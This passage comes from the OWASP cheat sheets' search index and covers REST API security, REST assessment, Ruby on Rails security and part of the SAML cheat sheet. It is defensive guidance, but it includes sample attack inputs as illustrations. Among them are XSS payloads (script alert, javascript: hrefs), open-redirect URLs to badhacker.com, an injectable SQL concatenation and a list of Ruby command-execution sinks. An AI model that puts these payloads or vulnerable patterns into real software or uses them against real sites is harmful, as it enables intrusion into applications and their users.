"},{"location":"cheatsheets/Query_Parameterization_Cheat_Sheet.html#references","title":"References","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html","title":"REST Assessment Cheat Sheet","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#about-restful-web-services","title":"About RESTful Web Services","text":"

Web Services are an implementation of web technology used for machine to machine communication. As such they are used for Inter application communication, Web 2.0 and Mashups and by desktop and mobile applications to call a server.

RESTful web services (often called simply REST) are a light weight variant of Web Services based on the RESTful design pattern. In practice RESTful web services utilizes HTTP requests that are similar to regular HTTP calls in contrast with other Web Services technologies such as SOAP which utilizes a complex protocol.

"},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#key-relevant-properties-of-restful-web-services","title":"Key relevant properties of RESTful web services","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#the-challenge-of-security-testing-restful-web-services","title":"The challenge of security testing RESTful web services","text":""},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#how-to-pentest-a-restful-web-service","title":"How to pentest a RESTful web service","text":"

Determine the attack surface through documentation - RESTful pen testing might be better off if some level of white box testing is allowed and you can get information about the service.

This information will ensure fuller coverage of the attack surface. Such information to look for:

Collect full requests using a proxy - while always an important pen testing step, this is more important for REST based applications as the application UI may not give clues on the actual attack surface.

Note that the proxy must be able to collect full requests and not just URLs as REST services utilize more than just GET parameters.

Analyze collected requests to determine the attack surface:

Verify non-standard parameters: in some cases (but not all), setting the value of a URL segment suspected of being a parameter to a value expected to be invalid can help determine if it is a path elements of a parameter. If a path element, the web server will return a 404 message, while for an invalid value to a parameter the answer would be an application level message as the value is legal at the web server level.

Analyzing collected requests to optimize fuzzing - after identifying potential parameters to fuzz, analyze the collected values for each to determine:

Lastly, when fuzzing, don't forget to emulate the authentication mechanism used.

"},{"location":"cheatsheets/REST_Assessment_Cheat_Sheet.html#related-resources","title":"Related Resources","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html","title":"REST Security Cheat Sheet","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

REST (or REpresentational State Transfer) is an architectural style first described in Roy Fielding's Ph.D. dissertation on Architectural Styles and the Design of Network-based Software Architectures.

It evolved as Fielding wrote the HTTP/1.1 and URI specs and has been proven to be well-suited for developing distributed hypermedia applications. While REST is more widely applicable, it is most commonly used within the context of communicating with services via HTTP.

The key abstraction of information in REST is a resource. A REST API resource is identified by a URI, usually a HTTP URL. REST components use connectors to perform actions on a resource by using a representation to capture the current or intended state of the resource and transferring that representation.

The primary connector types are client and server, secondary connectors include cache, resolver and tunnel.

REST APIs are stateless. Stateful APIs do not adhere to the REST architectural style. State in the REST acronym refers to the state of the resource which the API accesses, not the state of a session within which the API is called. While there may be good reasons for building a stateful API, it is important to realize that managing sessions is complex and difficult to do securely.

Stateful services are out of scope of this Cheat Sheet: Passing state from client to backend, while making the service technically stateless, is an anti-pattern that should also be avoided as it is prone to replay and impersonation attacks.

In order to implement flows with REST APIs, resources are typically created, read, updated and deleted. For example, an ecommerce site may offer methods to create an empty shopping cart, to add items to the cart and to check out the cart. Each of these REST calls is stateless and the endpoint should check whether the caller is authorized to perform the requested operation.

Another key feature of REST applications is the use of standard HTTP verbs and error codes in the pursuit or removing unnecessary variation among different services.

Another key feature of REST applications is the use of HATEOAS or Hypermedia As The Engine of Application State. This provides REST applications a self-documenting nature making it easier for developers to interact with a REST service without prior knowledge.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#https","title":"HTTPS","text":"

Secure REST services must only provide HTTPS endpoints. This protects authentication credentials in transit, for example passwords, API keys or JSON Web Tokens. It also allows clients to authenticate the service and guarantees integrity of the transmitted data.

See the Transport Layer Protection Cheat Sheet for additional information.

Consider the use of mutually authenticated client-side certificates to provide additional protection for highly privileged web services.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#access-control","title":"Access Control","text":"

Non-public REST services must perform access control at each API endpoint. Web services in monolithic applications implement this by means of user authentication, authorization logic and session management. This has several drawbacks for modern architectures which compose multiple microservices following the RESTful style.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#jwt","title":"JWT","text":"

There seems to be a convergence towards using JSON Web Tokens (JWT) as the format for security tokens. JWTs are JSON data structures containing a set of claims that can be used for access control decisions. A cryptographic signature or message authentication code (MAC) can be used to protect the integrity of the JWT.

If MACs are used for integrity protection, every service that is able to validate JWTs can also create new JWTs using the same key. This means that all services using the same key have to mutually trust each other. Another consequence of this is that a compromise of any service also compromises all other services sharing the same key. See here for additional information.

The relying party or token consumer validates a JWT by verifying its integrity and claims contained.

Some claims have been standardized and should be present in JWT used for access controls. At least the following of the standard claims should be verified:

As JWTs contain details of the authenticated entity (user etc.) a disconnect can occur between the JWT and the current state of the users session, for example, if the session is terminated earlier than the expiration time due to an explicit logout or an idle timeout. When an explicit session termination event occurs, a digest or hash of any associated JWTs should be submitted to a block list on the API which will invalidate that JWT for any requests until the expiration of the token. See the JSON_Web_Token_for_Java_Cheat_Sheet for further details.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#api-keys","title":"API Keys","text":"

Public REST services without access control run the risk of being farmed leading to excessive bills for bandwidth or compute cycles. API keys can be used to mitigate this risk. They are also often used by organisation to monetize APIs; instead of blocking high-frequency calls, clients are given access in accordance to a purchased access plan.

API keys can reduce the impact of denial-of-service attacks. However, when they are issued to third-party clients, they are relatively easy to compromise.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#restrict-http-methods","title":"Restrict HTTP methods","text":"

In Java EE in particular, this can be difficult to implement properly. See Bypassing Web Authentication and Authorization with HTTP Verb Tampering for an explanation of this common misconfiguration.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#input-validation","title":"Input validation","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#validate-content-types","title":"Validate content types","text":"

A REST request or response body should match the intended content type in the header. Otherwise this could cause misinterpretation at the consumer/producer side and lead to code injection/execution.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#validate-request-content-types","title":"Validate request content types","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#send-safe-response-content-types","title":"Send safe response content types","text":"

It is common for REST services to allow multiple response types (e.g. application/xml or application/json, and the client specifies the preferred order of response types by the Accept header in the request.

Services including script code (e.g. JavaScript) in their responses must be especially careful to defend against header injection attack.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#management-endpoints","title":"Management endpoints","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#error-handling","title":"Error handling","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#audit-logs","title":"Audit logs","text":""},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#security-headers","title":"Security Headers","text":"

There are a number of security related headers that can be returned in the HTTP responses to instruct browsers to act in specific ways. However, some of these headers are intended to be used with HTML responses, and as such may provide little or no security benefits on an API that does not return HTML.

The following headers should be included in all API responses:

Header Rationale Cache-Control: no-store Prevent sensitive information from being cached. Content-Security-Policy: frame-ancestors 'none' To protect against drag-and-drop style clickjacking attacks. Content-Type To specify the content type of the response. This should be application/json for JSON responses. Strict-Transport-Security To require connections over HTTPS and to protect against spoofed certificates. X-Content-Type-Options: nosniff To prevent browsers from performing MIME sniffing, and inappropriately interpreting responses as HTML. X-Frame-Options: DENY To protect against drag-and-drop style clickjacking attacks.

The headers below are only intended to provide additional security when responses are rendered as HTML. As such, if the API will never return HTML in responses, then these headers may not be necessary. However, if there is any uncertainty about the function of the headers, or the types of information that the API returns (or may return in future), then it is recommended to include them as part of a defence-in-depth approach.

Header Example Rationale Content-Security-Policy Content-Security-Policy: default-src 'none' The majority of CSP functionality only affects pages rendered as HTML. Permissions-Policy Permissions-Policy: accelerometer=(), ambient-light-sensor=(), autoplay=(), battery=(), camera=(), cross-origin-isolated=(), display-capture=(), document-domain=(), encrypted-media=(), execution-while-not-rendered=(), execution-while-out-of-viewport=(), fullscreen=(), geolocation=(), gyroscope=(), keyboard-map=(), magnetometer=(), microphone=(), midi=(), navigation-override=(), payment=(), picture-in-picture=(), publickey-credentials-get=(), screen-wake-lock=(), sync-xhr=(), usb=(), web-share=(), xr-spatial-tracking=() This header used to be named Feature-Policy. When browsers heed this header, it is used to control browser features via directives. The example disables features with an empty allowlist for a number of permitted directive names. When you apply this header, verify that the directives are up-to-date and fit your needs. Please have a look at this article for a detailed explanation on how to control browser features. Referrer-Policy Referrer-Policy: no-referrer Non-HTML responses should not trigger additional requests."},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#cors","title":"CORS","text":"

Cross-Origin Resource Sharing (CORS) is a W3C standard to flexibly specify what cross-domain requests are permitted. By delivering appropriate CORS Headers your REST API signals to the browser which domains, AKA origins, are allowed to make JavaScript calls to the REST service.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#sensitive-information-in-http-requests","title":"Sensitive information in HTTP requests","text":"

RESTful web services should be careful to prevent leaking credentials. Passwords, security tokens, and API keys should not appear in the URL, as this can be captured in web server logs, which makes them intrinsically valuable.

OK:

https://example.com/resourceCollection/[ID]/action

https://twitter.com/vanderaj/lists

NOT OK:

https://example.com/controller/123/action?apiKey=a53f435643de32 because API Key is into the URL.

"},{"location":"cheatsheets/REST_Security_Cheat_Sheet.html#http-return-code","title":"HTTP Return Code","text":"

HTTP defines status code. When designing REST API, don't just use 200 for success or 404 for error. Always use the semantically appropriate status code for the response.

Here is a non-exhaustive selection of security related REST API status codes. Use it to ensure you return the correct code.

Code Message Description 200 OK Response to a successful REST API action. The HTTP method can be GET, POST, PUT, PATCH or DELETE. 201 Created The request has been fulfilled and resource created. A URI for the created resource is returned in the Location header. 202 Accepted The request has been accepted for processing, but processing is not yet complete. 301 Moved Permanently Permanent redirection. 304 Not Modified Caching related response that returned when the client has the same copy of the resource as the server. 307 Temporary Redirect Temporary redirection of resource. 400 Bad Request The request is malformed, such as message body format error. 401 Unauthorized Wrong or no authentication ID/password provided. 403 Forbidden It's used when the authentication succeeded but authenticated user doesn't have permission to the request resource. 404 Not Found When a non-existent resource is requested. 405 Method Not Acceptable The error for an unexpected HTTP method. For example, the REST API is expecting HTTP GET, but HTTP PUT is used. 406 Unacceptable The client presented a content type in the Accept header which is not supported by the server API. 413 Payload too large Use it to signal that the request size exceeded the given limit e.g. regarding file uploads. 415 Unsupported Media Type The requested content type is not supported by the REST service. 429 Too Many Requests The error is used when there may be DOS attack detected or the request is rejected due to rate limiting. 500 Internal Server Error An unexpected condition prevented the server from fulfilling the request. Be aware that the response should not reveal internal information that helps an attacker, e.g. detailed error messages or stack traces. 501 Not Implemented The REST service does not implement the requested operation yet. 503 Service Unavailable The REST service is temporarily unable to process the request. Used to inform the client it should retry at a later time.

Additional information about HTTP return code usage in REST API can be found here and here.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html","title":"Ruby on Rails Cheat Sheet","text":""},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#introduction","title":"Introduction","text":"

This Cheatsheet intends to provide quick basic Ruby on Rails security tips for developers. It complements, augments or emphasizes points brought up in the Rails security guide from rails core.

The Rails framework abstracts developers from quite a bit of tedious work and provides the means to accomplish complex tasks quickly and with ease. New developers, those unfamiliar with the inner-workings of Rails, likely need a basic set of guidelines to secure fundamental aspects of their application. The intended purpose of this doc is to be that guide.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#items","title":"Items","text":""},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#command-injection","title":"Command Injection","text":"

Ruby offers a function called \"eval\" which will dynamically build new Ruby code based on Strings. It also has a number of ways to call system commands.

eval(\"ruby code here\")\nsystem(\"os command here\")\n`ls -al /` # (backticks contain os command)\nexec(\"os command here\")\nspawn(\"os command here\")\nopen(\"| os command here\")\nProcess.exec(\"os command here\")\nProcess.spawn(\"os command here\")\nIO.binread(\"| os command here\")\nIO.binwrite(\"| os command here\", \"foo\")\nIO.foreach(\"| os command here\") {}\nIO.popen(\"os command here\")\nIO.read(\"| os command here\")\nIO.readlines(\"| os command here\")\nIO.write(\"| os command here\", \"foo\")\n

While the power of these commands is quite useful, extreme care should be taken when using them in a Rails based application. Usually, its just a bad idea. If need be, an allow-list of possible values should be used and any input should be validated as thoroughly as possible.

The guides from Rails and OWASP contain further information on command injection.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sql-injection","title":"SQL Injection","text":"

Ruby on Rails is often used with an ORM called ActiveRecord, though it is flexible and can be used with other data sources. Typically very simple Rails applications use methods on the Rails models to query data. Many use cases protect for SQL Injection out of the box. However, it is possible to write code that allows for SQL Injection.

name = params[:name]\n@projects = Project.where(\"name like '\" + name + \"'\");\n

The statement is injectable because the name parameter is not escaped.

Here is the idiom for building this kind of statement:

@projects = Project.where(\"name like ?\", \"%#{ActiveRecord::Base.sanitize_sql_like(params[:name])}%\")\n

Use caution not to build SQL statements based on user controlled input. A list of more realistic and detailed examples is here: rails-sqli.org. OWASP has extensive information about SQL Injection.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-site-scripting-xss","title":"Cross-site Scripting (XSS)","text":"

By default, protection against XSS comes as the default behavior. When string data is shown in views, it is escaped prior to being sent back to the browser. This goes a long way, but there are common cases where developers bypass this protection - for example to enable rich text editing. In the event that you want to pass variables to the front end with tags intact, it is tempting to do the following in your .erb file (ruby markup).

# Wrong! Do not do this!\n<%= raw @product.name %>\n\n# Wrong! Do not do this!\n<%== @product.name %>\n\n# Wrong! Do not do this!\n<%= @product.name.html_safe %>\n\n# Wrong! Do not do this!\n<%= content_tag @product.name %>\n

Unfortunately, any field that uses raw, html_safe, content_tag or similar like this will be a potential XSS target. Note that there are also widespread misunderstandings about html_safe().

This writeup describes the underlying SafeBuffer mechanism in detail. Other tags that change the way strings are prepared for output can introduce similar issues, including content_tag.

content_tag(\"/><script>alert('hack!');</script>\") # XSS example\n# produces: </><script>alert('hack!');</script>><//><script>alert('hack!');</script>>\n

The method html_safe of String is somewhat confusingly named. It means that we know for sure the content of the string is safe to include in HTML without escaping. This method itself is un-safe!

If you must accept HTML content from users, consider a markup language for rich text in an application (Examples include: Markdown and textile) and disallow HTML tags. This helps ensures that the input accepted doesn't include HTML content that could be malicious.

If you cannot restrict your users from entering HTML, consider implementing content security policy to disallow the execution of any JavaScript. And finally, consider using the #sanitize method that lets you list allowed tags. Be careful, this method has been shown to be flawed numerous times and will never be a complete solution.

An often overlooked XSS attack vector for older versions of rails is the href value of a link:

<%= link_to \"Personal Website\", @user.website %>\n

If @user.website contains a link that starts with javascript:, the content will execute when a user clicks the generated link:

<a href=\"javascript:alert('Haxored')\">Personal Website</a>\n

Newer Rails versions escape such links in a better way.

link_to \"Personal Website\", 'javascript:alert(1);'.html_safe()\n# Will generate:\n# \"<a href=\"javascript:alert(1);\">Personal Website</a>\"\n

Using Content Security Policy is one more security measure to forbid execution for links starting with javascript: .

Brakeman scanner helps in finding XSS problems in Rails apps.

OWASP provides more general information about XSS in a top level page: Cross-site Scripting (XSS).

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sessions","title":"Sessions","text":"

By default, Ruby on Rails uses a Cookie based session store. What that means is that unless you change something, the session will not expire on the server. That means that some default applications may be vulnerable to replay attacks. It also means that sensitive information should never be put in the session.

The best practice is to use a database based session, which thankfully is very easy with Rails:

Project::Application.config.session_store :active_record_store\n

There is an Session Management Cheat Sheet.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#authentication","title":"Authentication","text":"

As with all sensitive data, start securing your authentication with enabling TLS in your configuration:

# config/environments/production.rb\n# Force all access to the app over SSL, use Strict-Transport-Security,\n# and use secure cookies\nconfig.force_ssl = true\n

Uncomment the line 3 as above in your configuration.

Generally speaking, Rails does not provide authentication by itself. However, most developers using Rails leverage libraries such as Devise or AuthLogic to provide authentication.

To enable authentication it is possible to use Devise gem.

Install it using:

gem\u00a0'devise'\n

Then install it to the user model:

rails\u00a0generate\u00a0devise:install\n

Next, specify which resources (routes) require authenticated access in routes:

Rails.application.routes.draw do\nauthenticate :user do\nresources :something do  # these resource require authentication\n...\nend\nend\n\ndevise_for :users # sign-up/-in/out routes\n\nroot to: 'static#home' # no authentication required\nend\n

To enforce password complexity, it is possible to use zxcvbn gem. Configure your user model with it:

class User < ApplicationRecord\ndevise :database_authenticatable,\n# other devise features, then\n:zxcvbnable\nend\n

And configure the required password complexity:

# in config/initializers/devise.rb\nDevise.setup do |config|\n# zxcvbn score for devise\nconfig.min_password_score = 4 # complexity score here.\n...\n

You can try out this PoC to learn more about it.

Next, omniauth gem allows for multiple strategies for authentication. Using it one can configure secure authentication with Facebook, LDAP and many other providers. Read on here.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#token-authentication","title":"Token Authentication","text":"

Devise usually uses Cookies for authentication.

In the case token authentication is wished instead, it could be implemented with a gem devise_token_auth.

It supports multiple front end technologies, for example angular2-token.

This gem is configured similar to the devise gem itself. It also requires omniauth as a dependency.

#\u00a0token-based\u00a0authentication\ngem\u00a0'devise_token_auth'\ngem\u00a0'omniauth'\n

Then a route is defined:

mount_devise_token_auth_for\u00a0'User',\u00a0at:\u00a0'auth'\n

And the User model is modified accordingly.

These actions can be done with one command:

rails\u00a0g\u00a0devise_token_auth:install\u00a0[USER_CLASS]\u00a0[MOUNT_PATH]\n

You may need to edit the generated migration to avoid unnecessary fields and/or field duplication depending on your use case.

Note: when you use only token authentication, there is no more need in CSRF protection in controllers. If you use both ways: cookies and tokens, the paths where cookies are used for authentication still must be protected from forgery!

There is an Authentication Cheat Sheet.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#insecure-direct-object-reference-or-forceful-browsing","title":"Insecure Direct Object Reference or Forceful Browsing","text":"

By default, Ruby on Rails apps use a RESTful URI structure. That means that paths are often intuitive and guessable. To protect against a user trying to access or modify data that belongs to another user, it is important to specifically control actions. Out of the gate on a vanilla Rails application, there is no such built-in protection. It is possible to do this by hand at the controller level.

It is also possible, and probably recommended, to consider resource-based access control libraries such as cancancan (cancan replacement) or pundit to do this. This ensures that all operations on a database object are authorized by the business logic of the application.

More general information about this class of vulnerability is in the OWASP Top 10 Page.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#csrf-cross-site-request-forgery","title":"CSRF (Cross Site Request Forgery)","text":"

Ruby on Rails has specific, built-in support for CSRF tokens. To enable it, or ensure that it is enabled, find the base ApplicationController and look for a directive such as the following:

class ApplicationController < ActionController::Base\nprotect_from_forgery\n

Note that the syntax for this type of control includes a way to add exceptions. Exceptions may be useful for APIs or other reasons - but should be reviewed and consciously included. In the example below, the Rails ProjectController will not provide CSRF protection for the show method.

class ProjectController < ApplicationController\nprotect_from_forgery except: :show\n

Also note that by default Rails does not provide CSRF protection for any HTTP GET request.

Note: if you use token authentication only, there is no need to protect from CSRF in controllers like this. If cookie-based authentication is used on some paths, then the protections is still required on them.

There is a top level OWASP page for Cross-Site Request Forgery (CSRF).

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#redirects-and-forwards","title":"Redirects and Forwards","text":"

Web applications often require the ability to dynamically redirect users based on client-supplied data. To clarify, dynamic redirection usually entails the client including a URL in a parameter within a request to the application. Once received by the application, the user is redirected to the URL specified in the request.

For example:

http://www.example.com/redirect?url=http://www.example_commerce_site.com/checkout

The above request would redirect the user to http://www.example.com/checkout. The security concern associated with this functionality is leveraging an organization's trusted brand to phish users and trick them into visiting a malicious site, in our example, badhacker.com.

Example:

http://www.example.com/redirect?url=http://badhacker.com

The most basic, but restrictive protection is to use the :only_path option. Setting this to true will essentially strip out any host information. However, the :only_path option must be part of the first argument. If the first argument is not a hash table, then there is no way to pass in this option. In the absence of a custom helper or allow list, this is one approach that can work:

begin\nif path = URI.parse(params[:url]).path\nredirect_to path\nend\nrescue URI::InvalidURIError\nredirect_to '/'\nend\n

If matching user input against a list of approved sites or TLDs against regular expression is a must, it makes sense to leverage a library such as URI.parse() to obtain the host and then take the host value and match it against regular expression patterns. Those regular expressions must, at a minimum, have anchors or there is a greater chance of an attacker bypassing the validation routine.

Example:

require 'uri'\nhost = URI.parse(\"#{params[:url]}\").host\n# this can be vulnerable to javascript://trusted.com/%0Aalert(0)\n# so check .scheme and .port too\nvalidation_routine(host) if host\ndef validation_routine(host)\n# Validation routine where we use  \\A and \\z as anchors *not* ^ and $\n# you could also check the host value against an allow list\nend\n

Also blind redirecting to user input parameter can lead to XSS.

Example code:

redirect_to params[:to]\n

Will give this URL:

http://example.com/redirect?to[status]=200&to[protocol]=javascript:alert(0)//

The obvious fix for this type of vulnerability is to restrict to specific Top-Level Domains (TLDs), statically define specific sites, or map a key to it's value.

Example code:

ACCEPTABLE_URLS = {\n'our_app_1' => \"https://www.example_commerce_site.com/checkout\",\n'our_app_2' => \"https://www.example_user_site.com/change_settings\"\n}\n

Will give this URL:

http://www.example.com/redirect?url=our_app_1

Redirection handling code:

def redirect\nurl = ACCEPTABLE_URLS[\"#{params[:url]}\"]\nredirect_to url if url\nend\n

There is a more general OWASP resource about unvalidated redirects and forwards.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#dynamic-render-paths","title":"Dynamic Render Paths","text":"

In Rails, controller actions and views can dynamically determine which view or partial to render by calling the render method. If user input is used in or for the template name, an attacker could cause the application to render an arbitrary view, such as an administrative page.

Care should be taken when using user input to determine which view to render. If possible, avoid any user input in the name or path to the view.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#cross-origin-resource-sharing","title":"Cross Origin Resource Sharing","text":"

Occasionally, a need arises to share resources with another domain. For example, a file-upload function that sends data via an AJAX request to another domain. In these cases, the same-origin rules followed by web browsers must be sent. Modern browsers, in compliance with HTML5 standards, will allow this to occur but in order to do this; a couple precautions must be taken.

When using a nonstandard HTTP construct, such as an atypical Content-Type header, for example, the following applies:

The receiving site should list only those domains allowed to make such requests as well as set the Access-Control-Allow-Origin header in both the response to the OPTIONS request and POST request. This is because the OPTIONS request is sent first, in order to determine if the remote or receiving site allows the requesting domain. Next, a second request, a POST request, is sent. Once again, the header must be set in order for the transaction to be shown as successful.

When standard HTTP constructs are used:

The request is sent and the browser, upon receiving a response, inspects the response headers in order to determine if the response can and should be processed.

Allow list in Rails:

Gemfile:

gem\u00a0'rack-cors',\u00a0:require\u00a0=>\u00a0'rack/cors'\n

config/application.rb:

module Sample\nclass Application < Rails::Application\nconfig.middleware.use Rack::Cors do\nallow do\norigins 'someserver.example.com'\nresource %r{/users/\\d+.json},\n:headers => ['Origin', 'Accept', 'Content-Type'],\n:methods => [:post, :get]\nend\nend\nend\nend\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#security-related-headers","title":"Security-related headers","text":"

To set a header value, simply access the response.headers object as a hash inside your controller (often in a before/after_filter).

response.headers['X-header-name']\u00a0=\u00a0'value'\n

Rails provides the default_headers functionality that will automatically apply the values supplied. This works for most headers in almost all cases.

ActionDispatch::Response.default_headers = {\n'X-Frame-Options' => 'SAMEORIGIN',\n'X-Content-Type-Options' => 'nosniff',\n'X-XSS-Protection' => '0'\n}\n

Strict transport security is a special case, it is set in an environment file (e.g. production.rb)

config.force_ssl\u00a0=\u00a0true\n

For those not on the edge, there is a library (secure_headers) for the same behavior with content security policy abstraction provided. It will automatically apply logic based on the user agent to produce a concise set of headers.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#business-logic-bugs","title":"Business Logic Bugs","text":"

Any application in any technology can contain business logic errors that result in security bugs. Business logic bugs are difficult to impossible to detect using automated tools. The best ways to prevent business logic security bugs are to do code review, pair program and write unit tests.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#attack-surface","title":"Attack Surface","text":"

Generally speaking, Rails avoids open redirect and path traversal types of vulnerabilities because of its /config/routes.rb file which dictates what URLs should be accessible and handled by which controllers. The routes file is a great place to look when thinking about the scope of the attack surface.

An example might be as follows:

#\u00a0this\u00a0is\u00a0an\u00a0example\u00a0of\u00a0what\u00a0NOT\u00a0to\u00a0do\nmatch\u00a0':controller(/:action(/:id(.:format)))'\n

In this case, this route allows any public method on any controller to be called as an action. As a developer, you want to make sure that users can only reach the controller methods intended and in the way intended.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#sensitive-files","title":"Sensitive Files","text":"

Many Ruby on Rails apps are open source and hosted on publicly available source code repositories. Whether that is the case or the code is committed to a corporate source control system, there are certain files that should be either excluded or carefully managed.

/config/database.yml\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0production\u00a0credentials.\n/config/initializers/secret_token.rb\u00a0-\u00a0\u00a0Contains\u00a0a\u00a0secret\u00a0used\u00a0to\u00a0hash\u00a0session\u00a0cookie.\n/db/seeds.rb\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0seed\u00a0data\u00a0including\u00a0bootstrap\u00a0admin\u00a0user.\n/db/development.sqlite3\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0\u00a0-\u00a0\u00a0May\u00a0contain\u00a0real\u00a0data.\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#encryption","title":"Encryption","text":"

Rails uses OS encryption. Generally speaking, it is always a bad idea to write your own encryption.

Devise by default uses bcrypt for password hashing, which is an appropriate solution.

Typically, the following config causes the 10 stretches for production: /config/initializers/devise.rb

config.stretches\u00a0=\u00a0Rails.env.test?\u00a0?\u00a01\u00a0:\u00a010\n
"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#updating-rails-and-having-a-process-for-updating-dependencies","title":"Updating Rails and Having a Process for Updating Dependencies","text":"

In early 2013, a number of critical vulnerabilities were identified in the Rails Framework. Organizations that had fallen behind current versions had more trouble updating and harder decisions along the way, including patching the source code for the framework itself.

An additional concern with Ruby applications in general is that most libraries (gems) are not signed by their authors. It is literally impossible to build a Rails based project with libraries that come from trusted sources. One good practice might be to audit the gems you are using.

In general, it is important to have a process for updating dependencies. An example process might define three mechanisms for triggering an update of response:

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#tools","title":"Tools","text":"

Use brakeman, an open source code analysis tool for Rails applications, to identify many potential issues. It will not necessarily produce comprehensive security findings, but it can find easily exposed issues. A great way to see potential issues in Rails is to review the brakeman documentation of warning types.

A newer alternative is bearer, an open source code security and privacy analysis tool for both Ruby and JavaScript/TypeScript code, in order to identify a broad range of OWASP Top 10 potential issues. It provides many configuration options and can easily integrate into your CI/CD pipeline.

There are emerging tools that can be used to track security issues in dependency sets, like automated scanning from GitHub and GitLab.

Another area of tooling is the security testing tool Gauntlt which is built on cucumber and uses gherkin syntax to define attack files.

Launched in May 2013 and very similar to brakeman scanner, the dawnscanner rubygem is a static analyzer for security issues that work with Rails, Sinatra and Padrino web applications. Version 1.6.6 has more than 235 ruby specific CVE security checks.

"},{"location":"cheatsheets/Ruby_on_Rails_Cheat_Sheet.html#related-articles-and-references","title":"Related Articles and References","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html","title":"SAML Security Cheat Sheet","text":""},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#introduction","title":"Introduction","text":"

The Security Assertion Markup Language (SAML) is an open standard for exchanging authorization and authentication information. The Web Browser SAML/SSO Profile with Redirect/POST bindings is one of the most common SSO implementation. This cheatsheet will focus primarily on that profile.

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-message-confidentiality-and-integrity","title":"Validate Message Confidentiality and Integrity","text":"

TLS 1.2 is the most common solution to guarantee message confidentiality and integrity at the transport layer. Refer to SAML Security (section 4.2.1) for additional information. This step will help counter the following attacks:

A digitally signed message with a certified key is the most common solution to guarantee message integrity and authentication. Refer to SAML Security (section 4.3) for additional information. This step will help counter the following attacks:

Assertions may be encrypted via XMLEnc to prevent disclosure of sensitive attributes post transportation. Refer to SAML Security (section 4.2.2) for additional information. This step will help counter the following attacks:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-protocol-usage","title":"Validate Protocol Usage","text":"

This is a common area for security gaps - see Google SSO vulnerability for a real life example. Their SSO profile was vulnerable to a Man-in-the-middle attack from a malicious SP (Service Provider).

The SSO Web Browser Profile is most susceptible to attacks from trusted partners. This particular security flaw was exposed because the SAML Response did not contain all of the required data elements necessary for a secure message exchange. Following the SAML Profile usage requirements for AuthnRequest (4.1.4.1) and Response (4.1.4.2) will help counter this attack.

The AVANTSSAR team suggested the following data elements should be required:

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-signatures","title":"Validate Signatures","text":"

Vulnerabilities in SAML implementations due to XML Signature Wrapping attacks were described in 2012, On Breaking SAML: Be Whoever You Want to Be.

The following recommendations were proposed in response (Secure SAML validation to prevent XML signature wrapping attacks):

"},{"location":"cheatsheets/SAML_Security_Cheat_Sheet.html#validate-protocol-processing-rules","title":"Validate Protocol Processing Rules","text":"

This is another common area for security gaps simply because of the vast number of steps to assert.

Processing a SAML response is an expensive operation but all steps must be validated:

